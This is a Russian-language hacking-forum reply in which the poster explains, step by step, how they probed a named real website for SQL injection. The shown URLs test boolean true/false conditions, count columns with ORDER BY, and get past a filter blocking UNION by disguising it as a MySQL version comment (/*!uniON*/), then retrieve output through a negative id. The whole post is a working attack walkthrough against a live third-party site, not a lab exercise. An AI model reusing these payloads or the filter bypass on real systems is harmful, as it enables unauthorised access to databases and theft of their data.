Сообщение от
er9j6@
как ты количество полей подобрал, каким запросом?
Тут главное внимательность.
http://1cnews.com/index.php?mode=viewpart&part=10
Делаем запрос:
http://1cnews.com/index.php?mode=viewpart&part=10'
В заголовке исчезает "Events of the branch". Что то тут не так
Проверяем на inj.
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1
"Events of the branch" появился. А если:
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=2
Исчез. Соответственно, true и false.
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+1 0--+f
Заголовок исчез.
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+3--+f
Пояивлся, соответственно, кол-во 3.
Ну а дальше
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+union+sele ct+1,2,3--+f
403 forbidden
Попробуем убрать union, все выводится, значит фильтрует union. Шифруем union => /*!uniON*/
Пробуем
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+/*!uniON*/+select+1,2,3--+f
Заголовок есть, 10 заменяем на -10. В заголовке видим цифру
2.
P.S. Вообщем контент-based injection